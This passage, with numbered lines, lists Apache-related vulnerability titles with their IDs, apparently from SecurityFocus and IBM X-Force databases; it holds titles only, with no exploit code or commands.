10215| [3796] Apache HTTP Request Unexpected Behavior Vulnerability
10216| [3790] Apache Non-Existent Log Directory Denial Of Service Vulnerability
10217| [3786] Apache Win32 PHP.EXE Remote File Disclosure Vulnerability
10218| [3727] Oracle 9I Application Server PL/SQL Apache Module Directory Traversal Vulnerability
10219| [3726] Oracle 9I Application Server PL/SQL Apache Module Buffer Overflow Vulnerability
10220| [3596] Apache Split-Logfile File Append Vulnerability
10221| [3521] Apache mod_usertrack Predictable ID Generation Vulnerability
10222| [3335] Red Hat Linux Apache Remote Username Enumeration Vulnerability
10223| [3316] MacOS X Client Apache Directory Contents Disclosure Vulnerability
10224| [3256] Apache mod_auth_oracle Remote SQL Query Manipulation Vulnerability
10225| [3255] Apache mod_auth_mysql Remote SQL Query Manipulation Vulnerability
10226| [3254] Apache AuthPG Remote SQL Query Manipulation Vulnerability
10227| [3253] Apache mod_auth_pgsql_sys Remote SQL Query Manipulation Vulnerability
10228| [3251] Apache mod_auth_pgsql Remote SQL Query Manipulation Vulnerability
10229| [3176] Apache Mod ReWrite Rules Bypassing Image Linking Vulnerability
10230| [3169] Apache Server Address Disclosure Vulnerability
10231| [3009] Apache Possible Directory Index Disclosure Vulnerability
10232| [2982] Apache Tomcat Cross-Site Scripting Vulnerability
10233| [2852] MacOS X Client Apache File Protection Bypass Vulnerability
10234| [2740] Apache Web Server HTTP Request Denial of Service Vulnerability
10235| [2518] Apache Tomcat 3.0 Directory Traversal Vulnerability
10236| [2503] Apache Artificially Long Slash Path Directory Listing Vulnerability
10237| [2300] NCSA/Apache httpd ScriptAlias Source Retrieval Vulnerability
10238| [2216] Apache Web Server DoS Vulnerability
10239| [2182] Apache /tmp File Race Vulnerability
10240| [2171] Oracle Apache+WebDB Documented Backdoor Vulnerability
10241| [2060] Apache Web Server with Php 3 File Disclosure Vulnerability
10242| [1821] Apache mod_cookies Buffer Overflow Vulnerability
10243| [1728] Apache Rewrite Module Arbitrary File Disclosure Vulnerability
10244| [1658] SuSE Apache CGI Source Code Viewing Vulnerability
10245| [1656] SuSE Apache WebDAV Directory Listings Vulnerability
10246| [1575] Trustix Apache-SSL RPM Permissions Vulnerability
10247| [1548] Apache Jakarta-Tomcat /admin Context Vulnerability
10248| [1532] Apache Tomcat Snoop Servlet Information Disclosure Vulnerability
10249| [1531] Apache Tomcat 3.1 Path Revealing Vulnerability
10250| [1457] Apache::ASP source.asp Example Script Vulnerability
10251| [1284] Apache HTTP Server (win32) Root Directory Access Vulnerability
10252| [1083] Cobalt Raq Apache .htaccess Disclosure Vulnerability
10253|
10254| IBM X-Force - https://exchange.xforce.ibmcloud.com:
10255| [86258] Apache CloudStack text fields cross-site scripting
10256| [85983] Apache Subversion mod_dav_svn module denial of service
10257| [85875] Apache OFBiz UEL code execution
10258| [85874] Apache OFBiz Webtools View Log screen cross-site scripting
10259| [85871] Apache HTTP Server mod_session_dbd unspecified
10260| [85756] Apache Struts OGNL expression command execution
10261| [85755] Apache Struts DefaultActionMapper class open redirect
10262| [85586] Apache ActiveMQ CVE-2013-1879 cross-site scripting
10263| [85574] Apache HTTP Server mod_dav denial of service
10264| [85573] Apache Struts Showcase App OGNL code execution
10265| [85496] Apache CXF denial of service
10266| [85423] Apache Geronimo RMI classloader code execution
10267| [85326] Apache Santuario XML Security for C++ buffer overflow
10268| [85323] Apache Santuario XML Security for Java spoofing
10269| [85319] Apache Qpid Python client SSL spoofing
10270| [85019] Apache Santuario XML Security for C++ CVE-2013-2156 buffer overflow
10271| [85018] Apache Santuario XML Security for C++ CVE-2013-2155 denial of service
10272| [85017] Apache Santuario XML Security for C++ CVE-2013-2154 buffer overflow
10273| [85016] Apache Santuario XML Security for C++ CVE-2013-2153 spoofing
10274| [84952] Apache Tomcat CVE-2012-3544 denial of service
10275| [84763] Apache Struts CVE-2013-2135 security bypass
10276| [84762] Apache Struts CVE-2013-2134 security bypass
10277| [84719] Apache Subversion CVE-2013-2088 command execution
10278| [84718] Apache Subversion CVE-2013-2112 denial of service
10279| [84717] Apache Subversion CVE-2013-1968 denial of service
10280| [84577] Apache Tomcat security bypass
10281| [84576] Apache Tomcat symlink
10282| [84543] Apache Struts CVE-2013-2115 security bypass
10283| [84542] Apache Struts CVE-2013-1966 security bypass
10284| [84154] Apache Tomcat session hijacking
10285| [84144] Apache Tomcat denial of service
10286| [84143] Apache Tomcat information disclosure
10287| [84111] Apache HTTP Server command execution
10288| [84043] Apache Virtual Computing Lab cross-site scripting
10289| [84042] Apache Virtual Computing Lab cross-site scripting
10290| [83782] Apache CloudStack information disclosure
10291| [83781] Apache CloudStack security bypass
10292| [83720] Apache ActiveMQ cross-site scripting
10293| [83719] Apache ActiveMQ denial of service
10294| [83718] Apache ActiveMQ denial of service
10295| [83263] Apache Subversion denial of service
10296| [83262] Apache Subversion denial of service
10297| [83261] Apache Subversion denial of service
10298| [83259] Apache Subversion denial of service
10299| [83035] Apache mod_ruid2 security bypass
10300| [82852] Apache Qpid federation_tag security bypass
10301| [82851] Apache Qpid qpid::framing::Buffer denial of service
10302| [82758] Apache Rave User RPC API information disclosure
10303| [82663] Apache Subversion svn_fs_file_length() denial of service
10304| [82642] Apache Qpid qpid::framing::Buffer::checkAvailable() denial of service
10305| [82641] Apache Qpid AMQP denial of service
10306| [82626] Apache HTTP Server on Debian GNU/Linux Debian apache2ctl symlink
10307| [82618] Apache Commons FileUpload symlink
10308| [82360] Apache HTTP Server manager interface cross-site scripting
10309| [82359] Apache HTTP Server hostnames cross-site scripting
10310| [82338] Apache Tomcat log/logdir information disclosure
10311| [82328] Apache Maven and Apache Maven Wagon SSL spoofing
10312| [82268] Apache OpenJPA deserialization command execution
10313| [81981] Apache CXF UsernameTokens security bypass
10314| [81980] Apache CXF WS-Security security bypass
10315| [81398] Apache OFBiz cross-site scripting
10316| [81240] Apache CouchDB directory traversal
10317| [81226] Apache CouchDB JSONP code execution
10318| [81225] Apache CouchDB Futon user interface cross-site scripting
10319| [81211] Apache Axis2/C SSL spoofing
10320| [81167] Apache CloudStack DeployVM information disclosure
10321| [81166] Apache CloudStack AddHost API information disclosure
10322| [81165] Apache CloudStack createSSHKeyPair API information disclosure
10323| [80518] Apache Tomcat cross-site request forgery security bypass
10324| [80517] Apache Tomcat FormAuthenticator security bypass
10325| [80516] Apache Tomcat NIO denial of service
10326| [80408] Apache Tomcat replay-countermeasure security bypass
10327| [80407] Apache Tomcat HTTP Digest Access Authentication security bypass
10328| [80317] Apache Tomcat slowloris denial of service
10329| [79984] Apache Commons HttpClient SSL spoofing
10330| [79983] Apache CXF SSL spoofing
10331| [79830] Apache Axis2/Java SSL spoofing
10332| [79829] Apache Axis SSL spoofing
10333| [79809] Apache Tomcat DIGEST security bypass
10334| [79806] Apache Tomcat parseHeaders() denial of service
10335| [79540] Apache OFBiz unspecified
10336| [79487] Apache Axis2 SAML security bypass
10337| [79212] Apache Cloudstack code execution
10338| [78734] Apache CXF SOAP Action security bypass
10339| [78730] Apache Qpid broker denial of service
10340| [78617] Eucalyptus Apache Santuario (XML Security for Java) denial of service
10341| [78563] Apache mod_pagespeed module unspecified cross-site scripting
10342| [78562] Apache mod_pagespeed module security bypass
10343| [78454] Apache Axis2 security bypass
10344| [78452] Websense Web Security and Web Filter Apache Tomcat information disclosure
10345| [78451] Websense Web Security and Web Filter Apache Tomcat cross-site scripting
10346| [78321] Apache Wicket unspecified cross-site scripting
10347| [78183] Apache Struts parameters denial of service
10348| [78182] Apache Struts cross-site request forgery
10349| [78153] Apache Solr Autocomplete module for Drupal autocomplete results cross-site scripting
10350| [77987] mod_rpaf module for Apache denial of service
10351| [77958] Apache Struts skill name code execution
10352| [77914] Apache HTTP Server mod_negotiation module cross-site scripting
10353| [77913] Apache HTTP Server mod_proxy_ajp information disclosure
10354| [77568] Apache Qpid broker security bypass
10355| [77421] Apache Libcloud spoofing
10356| [77059] Oracle Solaris Cluster Apache Tomcat Agent unspecified
10357| [77046] Oracle Solaris Apache HTTP Server information disclosure
10358| [76837] Apache Hadoop information disclosure
10359| [76802] Apache Sling CopyFrom denial of service
10360| [76692] Apache Hadoop symlink
10361| [76535] Apache Roller console cross-site request forgery
10362| [76534] Apache Roller weblog cross-site scripting
10363| [76152] Apache CXF elements security bypass
10364| [76151] Apache CXF child policies security bypass
10365| [75983] MapServer for Windows Apache file include
10366| [75857] Apache Commons Compress and Apache Ant bzip2 denial of service
10367| [75558] Apache POI denial of service
10368| [75545] PHP apache_request_headers() buffer overflow
10369| [75302] Apache Qpid SASL security bypass
10370| [75211] Debian GNU/Linux apache 2 cross-site scripting
10371| [74901] Apache HTTP Server LD_LIBRARY_PATH privilege escalation
10372| [74871] Apache OFBiz FlexibleStringExpander code execution
10373| [74870] Apache OFBiz multiple cross-site scripting
10374| [74750] Apache Hadoop unspecified spoofing
10375| [74319] Apache Struts XSLTResult.java file upload
10376| [74313] Apache Traffic Server header buffer overflow
10377| [74276] Apache Wicket directory traversal
10378| [74273] Apache Wicket unspecified cross-site scripting
10379| [74181] Apache HTTP Server mod_fcgid module denial of service
10380| [73690] Apache Struts OGNL code execution
10381| [73432] Apache Solr extension for TYPO3 unspecified cross-site scripting
10382| [73100] Apache MyFaces in directory traversal
10383| [73096] Apache APR hash denial of service
10384| [73052] Apache Struts name cross-site scripting
10385| [73030] Apache CXF UsernameToken security bypass
10386| [72888] Apache Struts lastName cross-site scripting
10387| [72758] Apache HTTP Server httpOnly information disclosure
10388| [72757] Apache HTTP Server MPM denial of service
10389| [72585] Apache Struts ParameterInterceptor security bypass
10390| [72438] Apache Tomcat Digest security bypass
10391| [72437] Apache Tomcat Digest security bypass
10392| [72436] Apache Tomcat DIGEST security bypass
10393| [72425] Apache Tomcat parameter denial of service
10394| [72422] Apache Tomcat request object information disclosure
10395| [72377] Apache HTTP Server scoreboard security bypass
10396| [72345] Apache HTTP Server HTTP request denial of service
10397| [72229] Apache Struts ExceptionDelegator command execution
10398| [72089] Apache Struts ParameterInterceptor directory traversal
10399| [72088] Apache Struts CookieInterceptor command execution
10400| [72047] Apache Geronimo hash denial of service
10401| [72016] Apache Tomcat hash denial of service
10402| [71711] Apache Struts OGNL expression code execution
10403| [71654] Apache Struts interfaces security bypass
10404| [71620] Apache ActiveMQ failover denial of service
10405| [71617] Apache HTTP Server mod_proxy module information disclosure
10406| [71508] Apache MyFaces EL security bypass
10407| [71445] Apache HTTP Server mod_proxy security bypass
10408| [71203] Apache Tomcat servlets privilege escalation
10409| [71181] Apache HTTP Server ap_pregsub() denial of service
10410| [71093] Apache HTTP Server ap_pregsub() buffer overflow
10411| [70336] Apache HTTP Server mod_proxy information disclosure
10412| [69804] Apache HTTP Server mod_proxy_ajp denial of service
10413| [69472] Apache Tomcat AJP security bypass
10414| [69396] Apache HTTP Server ByteRange filter denial of service
10415| [69394] Apache Wicket multi window support cross-site scripting
10416| [69176] Apache Tomcat XML information disclosure
10417| [69161] Apache Tomcat jsvc information disclosure
10418| [68799] mod_authnz_external module for Apache mysql-auth.pl SQL injection
10419| [68541] Apache Tomcat sendfile information disclosure
10420| [68420] Apache XML Security denial of service
10421| [68238] Apache Tomcat JMX information disclosure
10422| [67860] Apache Rampart/C rampart_timestamp_token_validate security bypass
10423| [67804] Apache Subversion control rules information disclosure
10424| [67803] Apache Subversion control rules denial of service
10425| [67802] Apache Subversion baselined denial of service
10426| [67672] Apache Archiva multiple cross-site scripting
10427| [67671] Apache Archiva multiple cross-site request forgery
10428| [67564] Apache APR apr_fnmatch() denial of service
10429| [67532] IBM WebSphere Application Server org.apache.jasper.runtime.JspWriterImpl.response denial of service
10430| [67515] Apache Tomcat annotations security bypass
10431| [67480] Apache Struts s:submit information disclosure
10432| [67414] Apache APR apr_fnmatch() denial of service
10433| [67356] Apache Struts javatemplates cross-site scripting
10434| [67354] Apache Struts Xwork cross-site scripting
10435| [66676] Apache Tomcat HTTP BIO information disclosure
10436| [66675] Apache Tomcat web.xml security bypass
10437| [66640] Apache HttpComponents HttpClient Proxy-Authorization information disclosure
10438| [66241] Apache HttpComponents information disclosure
10439| [66154] Apache Tomcat ServletSecurity security bypass
10440| [65971] Apache Tomcat ServletSecurity security bypass
10441| [65876] Apache Subversion mod_dav_svn denial of service
10442| [65343] Apache Continuum unspecified cross-site scripting
10443| [65162] Apache Tomcat NIO connector denial of service
10444| [65161] Apache Tomcat javax.servlet.ServletRequest.getLocale() denial of service
10445| [65160] Apache Tomcat HTML Manager interface cross-site scripting
10446| [65159] Apache Tomcat ServletContect security bypass
10447| [65050] Apache CouchDB web-based administration UI cross-site scripting
10448| [64773] Oracle HTTP Server Apache Plugin unauthorized access
10449| [64473] Apache Subversion blame -g denial of service
10450| [64472] Apache Subversion walk() denial of service
10451| [64407] Apache Axis2 CVE-2010-0219 code execution
10452| [63926] Apache Archiva password privilege escalation
10453| [63785] Apache CouchDB LD_LIBRARY_PATH privilege escalation
10454| [63493] Apache Archiva credentials cross-site request forgery
10455| [63477] Apache Tomcat HttpOnly session hijacking
10456| [63422] Apache Tomcat sessionsList.jsp cross-site scripting
10457| [63303] Apache mod_fcgid module fcgid_header_bucket_read() buffer overflow
10458| [62959] Apache Shiro filters security bypass
10459| [62790] Apache Perl cgi module denial of service
10460| [62576] Apache Qpid exchange denial of service
10461| [62575] Apache Qpid AMQP denial of service
10462| [62354] Apache Qpid SSL denial of service
10463| [62235] Apache APR-util apr_brigade_split_line() denial of service
10464| [62181] Apache XML-RPC SAX Parser information disclosure
10465| [61721] Apache Traffic Server cache poisoning
10466| [61202] Apache Derby BUILTIN authentication functionality information disclosure
10467| [61186] Apache CouchDB Futon cross-site request forgery
10468| [61169] Apache CXF DTD denial of service
10469| [61070] Apache Jackrabbit search.jsp SQL injection
10470| [61006] Apache SLMS Quoting cross-site request forgery
10471| [60962] Apache Tomcat time cross-site scripting
10472| [60883] Apache mod_proxy_http information disclosure
10473| [60671] Apache HTTP Server mod_cache and mod_dav denial of service
10474| [60264] Apache Tomcat Transfer-Encoding denial of service
10475| [59746] Apache Axis2 axis2/axis2-admin page session hijacking
10476| [59588] Apache Axis2/Java XML DTD (Document Type Declaration) data denial of service
10477| [59413] Apache mod_proxy_http timeout information disclosure
10478| [59058] Apache MyFaces unencrypted view state cross-site scripting
10479| [58827] Apache Axis2 xsd file include
10480| [58790] Apache Axis2 modules cross-site scripting
10481| [58299] Apache ActiveMQ queueBrowse cross-site scripting
10482| [58169] Apache Tomcat Web Application Manager / Host Manager cross-site request forgery
10483| [58056] Apache ActiveMQ .jsp source code disclosure
10484| [58055] Apache Tomcat realm name information disclosure
10485| [58046] Apache HTTP Server mod_auth_shadow security bypass
10486| [57841] Apache Open For Business Project (OFBiz) subject cross-site scripting
10487| [57840] Apache Open For Business Project (OFBiz) multiple parameters cross-site scripting
10488| [57429] Apache CouchDB algorithms information disclosure
10489| [57398] Apache ActiveMQ Web console cross-site request forgery
10490| [57397] Apache ActiveMQ createDestination.action cross-site scripting
10491| [56653] Apache HTTP Server DNS spoofing
10492| [56652] Apache HTTP Server DNS cross-site scripting
10493| [56625] Apache HTTP Server request header information disclosure
10494| [56624] Apache HTTP Server mod_isapi orphaned callback pointer code execution
10495| [56623] Apache HTTP Server mod_proxy_ajp denial of service
10496| [55941] mod_proxy module for Apache ap_proxy_send_fb() buffer overflow
10497| [55857] Apache Tomcat WAR files directory traversal
10498| [55856] Apache Tomcat autoDeploy attribute security bypass
10499| [55855] Apache Tomcat WAR directory traversal
10500| [55210] Intuit component for Joomla! Apache information disclosure
10501| [54533] Apache Tomcat 404 error page cross-site scripting
10502| [54182] Apache Tomcat admin default password
10503| [53878] Apache Solr Search (solr) extension for TYPO3 unspecified cross-site scripting
10504| [53666] Apache HTTP Server Solaris pollset support denial of service
10505| [53650] Apache HTTP Server HTTP basic-auth module security bypass
10506| [53124] mod_proxy_ftp module for Apache HTTP header security bypass
10507| [53041] mod_proxy_ftp module for Apache denial of service
10508| [52540] Apache Portable Runtime and Apache Portable Utility library multiple buffer overflow
10509| [51953] Apache Tomcat Path Disclosure
10510| [51952] Apache Tomcat Path Traversal
10511| [51951] Apache stronghold-status Information Disclosure
10512| [51950] Apache stronghold-info Information Disclosure
10513| [51949] Apache PHP Source Code Disclosure
10514| [51948] Apache Multiviews Attack
10515| [51946] Apache JServ Environment Status Information Disclosure
10516| [51945] Apache error_log Information Disclosure
10517| [51944] Apache Default Installation Page Pattern Found
10518| [51943] Apache AXIS XML Parser echoheaders.jws Sample Web Service Denial of Service
10519| [51942] Apache AXIS XML External Entity File Retrieval
10520| [51941] Apache AXIS Sample Servlet Information Leak
10521| [51940] Apache access_log Information Disclosure
10522| [51626] Apache mod_deflate denial of service
10523| [51532] mod_proxy module for the Apache HTTP Server stream_reqbody_cl denial of service
10524| [51365] Apache Tomcat RequestDispatcher security bypass
10525| [51273] Apache HTTP Server Incomplete Request denial of service
10526| [51195] Apache Tomcat XML information disclosure
10527| [50994] Apache APR-util xml/apr_xml.c denial of service
10528| [50993] Apache APR-util apr_brigade_vprintf denial of service
10529| [50964] Apache APR-util apr_strmatch_precompile() denial of service
10530| [50930] Apache Tomcat j_security_check information disclosure
10531| [50928] Apache Tomcat AJP denial of service
10532| [50884] Apache HTTP Server XML ENTITY denial of service
10533| [50808] Apache HTTP Server AllowOverride privilege escalation
10534| [50108] Apache Struts s:a tag and s:url tag cross-site scripting
10535| [50059] Apache mod_proxy_ajp information disclosure
10536| [49951] Apache Tiles Expression Language (EL) expressions cross-site scripting
10537| [49925] Apache Geronimo Web Administrative Console cross-site request forgery
10538| [49924] Apache Geronimo console/portal/Server/Monitoring cross-site scripting
10539| [49921] Apache ActiveMQ Web interface cross-site scripting
10540| [49898] Apache Geronimo Services/Repository directory traversal
10541| [49725] Apache Tomcat mod_jk module information disclosure
10542| [49715] Apache mod_perl Apache::Status and Apache2::Status modules cross-site scripting
10543| [49712] Apache Struts unspecified cross-site scripting
10544| [49213] Apache Tomcat cal2.jsp cross-site scripting
10545| [48934] Apache Tomcat POST doRead method information disclosure
10546| [48211] Apache Tomcat header HTTP request smuggling
10547| [48163] libapache2-mod-auth-mysql module for Debian multibyte encoding SQL injection
10548| [48110] Apache Jackrabbit search.jsp and swr.jsp cross-site scripting
10549| [47709] Apache Roller "
10550| [47104] Novell Netware ApacheAdmin console security bypass
10551| [47086] Apache HTTP Server OS fingerprinting unspecified
10552| [46329] Apache Struts FilterDispatcher and DefaultStaticContentLoader class directory traversal
10553| [45791] Apache Tomcat RemoteFilterValve security bypass
10554| [44435] Oracle WebLogic Apache Connector buffer overflow
10555| [44411] Apache Tomcat allowLinking UTF-8 directory traversal
10556| [44223] Apache HTTP Server mod_proxy_ftp cross-site scripting
10557| [44156] Apache Tomcat RequestDispatcher directory traversal
10558| [44155] Apache Tomcat HttpServletResponse.sendError() cross-site scripting
10559| [43885] Oracle WebLogic Server Apache Connector buffer overflow
10560| [42987] Apache HTTP Server mod_proxy module denial of service
10561| [42915] Apache Tomcat JSP files path disclosure
10562| [42914] Apache Tomcat MS-DOS path disclosure
10563| [42892] Apache Tomcat unspecified unauthorized access
10564| [42816] Apache Tomcat Host Manager cross-site scripting
10565| [42303] Apache 403 error cross-site scripting
10566| [41618] Apache-SSL ExpandCert() authentication bypass
10567| [40761] Apache Derby RDBNAM parameter and DatabaseMetaData.getURL information disclosure
10568| [40736] Apache Tomcat HTTP/1.1 connector information disclosure
10569| [40614] Apache mod_jk2 HTTP Host header buffer overflow
10570| [40562] Apache Geronimo init information disclosure
10571| [40478] Novell Web Manager webadmin-apache.conf security bypass
10572| [40411] Apache Tomcat exception handling information disclosure
10573| [40409] Apache Tomcat native (APR based) connector weak security
10574| [40403] Apache Tomcat quotes and %5C cookie information disclosure
10575| [40388] Sun Java Plug-In org.apache.crimson.tree.XmlDocument security bypass
10576| [39893] Apache HTTP Server mod_negotiation HTTP response splitting
10577| [39867] Apache HTTP Server mod_negotiation cross-site scripting
10578| [39804] Apache Tomcat SingleSignOn information disclosure
10579| [39615] Apache HTTP Server mod_proxy_ftp.c UTF-7 cross-site scripting
10580| [39612] Apache HTTP Server mod_proxy_balancer buffer overflow
10581| [39608] Apache HTTP Server balancer manager cross-site request forgery
10582| [39476] Apache mod_proxy_balancer balancer_handler function denial of service
10583| [39474] Apache HTTP Server mod_proxy_balancer cross-site scripting
10584| [39472] Apache HTTP Server mod_status cross-site scripting
10585| [39201] Apache Tomcat JULI logging weak security
10586| [39158] Apache HTTP Server Windows SMB shares information disclosure
10587| [39001] Apache HTTP Server mod_imap and mod_imagemap module cross-site scripting
10588| [38951] Apache::AuthCAS Perl module cookie SQL injection
10589| [38800] Apache HTTP Server 413 error page cross-site scripting
10590| [38211] Apache Geronimo SQLLoginModule authentication bypass
10591| [37243] Apache Tomcat WebDAV directory traversal
10592| [37178] RHSA update for Apache HTTP Server mod_status module cross-site scripting not installed
10593| [37177] RHSA update for Apache HTTP Server Apache child process denial of service not installed
10594| [37119] RHSA update for Apache mod_auth_kerb off-by-one buffer overflow not installed
10595| [37100] RHSA update for Apache and IBM HTTP Server Expect header cross-site scripting not installed
10596| [36782] Apache Geronimo MEJB unauthorized access
10597| [36586] Apache HTTP Server UTF-7 cross-site scripting
10598| [36468] Apache Geronimo LoginModule security bypass
10599| [36467] Apache Tomcat functions.jsp cross-site scripting
10600| [36402] Apache Tomcat calendar cross-site request forgery
10601| [36354] Apache HTTP Server mod_proxy module denial of service
10602| [36352] Apache HTTP Server ap_proxy_date_canon() denial of service
10603| [36336] Apache Derby lock table privilege escalation
10604| [36335] Apache Derby schema privilege escalation
10605| [36006] Apache Tomcat "
10606| [36001] Apache Tomcat Host Manager Servlet alias cross-site scripting
10607| [35999] Apache Tomcat \"
10608| [35795] Apache Tomcat CookieExample cross-site scripting
10609| [35536] Apache Tomcat SendMailServlet example cross-site scripting
10610| [35384] Apache HTTP Server mod_cache module denial of service
10611| [35097] Apache HTTP Server mod_status module cross-site scripting
10612| [35095] Apache HTTP Server Prefork MPM module denial of service
10613| [34984] Apache HTTP Server recall_headers information disclosure
10614| [34966] Apache HTTP Server MPM content spoofing
10615| [34965] Apache HTTP Server MPM information disclosure
10616| [34963] Apache HTTP Server MPM multiple denial of service
10617| [34872] Apache MyFaces Tomahawk autoscroll parameter cross-site scripting
10618| [34869] Apache Tomcat JSP example Web application cross-site scripting
10619| [34868] Apache Tomcat Manager and Host Manager cross-site scripting
10620| [34496] Apache Tomcat JK Connector security bypass
10621| [34377] Apache Tomcat hello.jsp cross-site scripting
10622| [34212] Apache Tomcat SSL configuration security bypass
10623| [34210] Apache Tomcat Accept-Language cross-site scripting
10624| [34209] Apache Tomcat calendar application cross-site scripting
10625| [34207] Apache Tomcat implicit-objects.jsp cross-site scripting
10626| [34167] Apache Axis WSDL file path disclosure
10627| [34068] Apache Tomcat AJP connector information disclosure
10628| [33584] Apache HTTP Server suEXEC privilege escalation
10629| [32988] Apache Tomcat proxy module directory traversal
10630| [32794] Apache Tomcat JK Web Server Connector map_uri_to_worker() buffer overflow
10631| [32708] Debian Apache tty privilege escalation
10632| [32441] ApacheStats extract() PHP call unspecified
10633| [32128] Apache Tomcat default account
10634| [31680] Apache Tomcat RequestParamExample cross-site scripting
10635| [31649] Apache Tomcat Sample Servlet TroubleShooter detected
10636| [31557] BEA WebLogic Server and WebLogic Express Apache proxy plug-in denial of service
10637| [31236] Apache HTTP Server htpasswd.c strcpy buffer overflow
10638| [30456] Apache mod_auth_kerb off-by-one buffer overflow
10639| [29550] Apache mod_tcl set_var() format string
10640| [28620] Apache and IBM HTTP Server Expect header cross-site scripting
10641| [28357] Apache HTTP Server mod_alias script source information disclosure
10642| [28063] Apache mod_rewrite off-by-one buffer overflow
10643| [27902] Apache Tomcat URL information disclosure
10644| [26786] Apache James SMTP server denial of service
10645| [25680] libapache2 /tmp/svn file upload
10646| [25614] Apache Struts lookupMap cross-site scripting
10647| [25613] Apache Struts ActionForm denial of service
10648| [25612] Apache Struts isCancelled() security bypass
10649| [24965] Apache mod_python FileSession command execution
10650| [24716] Apache James spooler memory leak denial of service
10651| [24159] Apache Geronimo Web-Access-Log Viewer cross-site scripting
10652| [24158] Apache Geronimo jsp-examples cross-site scripting
10653| [24030] Apache auth_ldap module multiple format strings
10654| [24008] Apache mod_ssl custom error message denial of service
10655| [24003] Apache mod_auth_pgsql module multiple syslog format strings
10656| [23612] Apache mod_imap referer field cross-site scripting
10657| [23173] Apache Struts error message cross-site scripting
10658| [22942] Apache Tomcat directory listing denial of service
10659| [22858] Apache Multi-Processing Module code allows denial of service
10660| [22602] RHSA-2005:582 updates for Apache httpd not installed
10661| [22520] Apache mod-auth-shadow "
10662| [22466] ApacheTop symlink
10663| [22109] Apache HTTP Server ssl_engine_kernel client certificate validation
10664| [22006] Apache HTTP Server byte-range filter denial of service
10665| [21567] Apache mod_ssl off-by-one buffer overflow
10666| [21195] Apache HTTP Server header HTTP request smuggling
10667| [20383] Apache HTTP Server htdigest buffer overflow
10668| [19681] Apache Tomcat AJP12 request denial of service
10669| [18993] Apache HTTP server check_forensic symlink attack
10670| [18790] Apache Tomcat Manager cross-site scripting
10671| [18349] Apache HTTP server Apple HFS+ filesystem obtain information
10672| [18348] Apache HTTP server Apple HFS+ filesystem .DS_Store and .ht file disclosure
10673| [18347] Apache HTTP server Apple Mac OS X Server mod_digest_apple module could allow an attacker to replay responses
10674| [17961] Apache Web server ServerTokens has not been set
10675| [17930] Apache HTTP Server HTTP GET request denial of service
10676| [17785] Apache mod_include module buffer overflow
10677| [17671] Apache HTTP Server SSLCipherSuite bypass restrictions
10678| [17473] Apache HTTP Server Satisfy directive allows access to resources
10679| [17413] Apache htpasswd buffer overflow
10680| [17384] Apache HTTP Server environment variable configuration file buffer overflow
10681| [17382] Apache HTTP Server IPv6 apr_util denial of service
10682| [17366] Apache HTTP Server mod_dav module LOCK denial of service
10683| [17273] Apache HTTP Server speculative mode denial of service
10684| [17200] Apache HTTP Server mod_ssl denial of service
10685| [16890] Apache HTTP Server server-info request has been detected
10686| [16889] Apache HTTP Server server-status request has been detected
10687| [16705] Apache mod_ssl format string attack
10688| [16524] Apache HTTP Server ap_get_mime_headers_core denial of service
10689| [16387] Apache HTTP Server mod_proxy Content-Length buffer overflow
10690| [16230] Apache HTTP Server PHP denial of service
10691| [16214] Apache mod_ssl ssl_util_uuencode_binary buffer overflow
10692| [15958] Apache HTTP Server authentication modules memory corruption
10693| [15547] Apache HTTP Server mod_disk_cache local information disclosure
10694| [15540] Apache HTTP Server socket starvation denial of service
10695| [15467] Novell GroupWise WebAccess using Apache Web server allows viewing of files on the server
10696| [15422] Apache HTTP Server mod_access information disclosure
10697| [15419] Apache HTTP Server mod_ssl plain HTTP request denial of service
10698| [15293] Apache for Cygwin "
10699| [15065] Apache-SSL has a default password
10700| [15041] Apache HTTP Server mod_digest module could allow an attacker to replay responses
10701| [15015] Apache httpd server httpd.conf could allow a local user to bypass restrictions
10702| [14751] Apache Mod_python output filter information disclosure
10703| [14125] Apache HTTP Server mod_userdir module information disclosure
10704| [14075] Apache HTTP Server mod_php file descriptor leak
10705| [13703] Apache HTTP Server account
10706| [13689] Apache HTTP Server configuration allows symlinks
10707| [13688] Apache HTTP Server configuration allows SSI
10708| [13687] Apache HTTP Server Server: header value
10709| [13685] Apache HTTP Server ServerTokens value
10710| [13684] Apache HTTP Server ServerSignature value
10711| [13672] Apache HTTP Server config allows directory autoindexing
10712| [13671] Apache HTTP Server default content
10713| [13670] Apache HTTP Server config file directive references outside content root
10714| [13668] Apache HTTP Server httpd not running in chroot environment
10715| [13666] Apache HTTP Server CGI directory contains possible command interpreter or compiler
10716| [13664] Apache HTTP Server config file contains ScriptAlias entry
10717| [13663] Apache HTTP Server CGI support modules loaded
10718| [13661] Apache HTTP Server config file contains AddHandler entry
10719| [13660] Apache HTTP Server 500 error page not CGI script
10720| [13659] Apache HTTP Server 413 error page not CGI script
10721| [13658] Apache HTTP Server 403 error page not CGI script
10722| [13657] Apache HTTP Server 401 error page not CGI script
10723| [13552] Apache HTTP Server mod_cgid module information disclosure
10724| [13550] Apache GET request directory traversal
10725| [13516] Apache Cocoon XMLForm and JXForm could allow execution of code
10726| [13499] Apache Cocoon directory traversal allows downloading of boot.ini file
10727| [13429] Apache Tomcat non-HTTP request denial of service
10728| [13400] Apache HTTP server mod_alias and mod_rewrite buffer overflow
10729| [13295] Apache weak password encryption
10730| [13254] Apache Tomcat .jsp cross-site scripting
10731| [13125] Apache::Gallery Inline::C could allow arbitrary code execution
10732| [13086] Apache Jakarta Tomcat mod_jk format string allows remote access
10733| [12681] Apache HTTP Server mod_proxy could allow mail relaying
10734| [12662] Apache HTTP Server rotatelogs denial of service
10735| [12554] Apache Tomcat stores password in plain text
10736| [12553] Apache HTTP Server redirects and subrequests denial of service
10737| [12552] Apache HTTP Server FTP proxy server denial of service
10738| [12551] Apache HTTP Server prefork MPM denial of service
10739| [12550] Apache HTTP Server weaker than expected encryption
10740| [12549] Apache HTTP Server type-map file denial of service
10741| [12206] Apache Tomcat /opt/tomcat directory insecure permissions
10742| [12102] Apache Jakarta Tomcat MS-DOS device name request denial of service
10743| [12091] Apache HTTP Server apr_password_validate denial of service
10744| [12090] Apache HTTP Server apr_psprintf code execution
10745| [11804] Apache HTTP Server mod_access_referer denial of service
10746| [11750] Apache HTTP Server could leak sensitive file descriptors
10747| [11730] Apache HTTP Server error log and access log terminal escape sequence injection
10748| [11703] Apache long slash path allows directory listing
10749| [11695] Apache HTTP Server LF (Line Feed) denial of service
10750| [11694] Apache HTTP Server filestat.c denial of service
10751| [11438] Apache HTTP Server MIME message boundaries information disclosure
10752| [11412] Apache HTTP Server error log terminal escape sequence injection
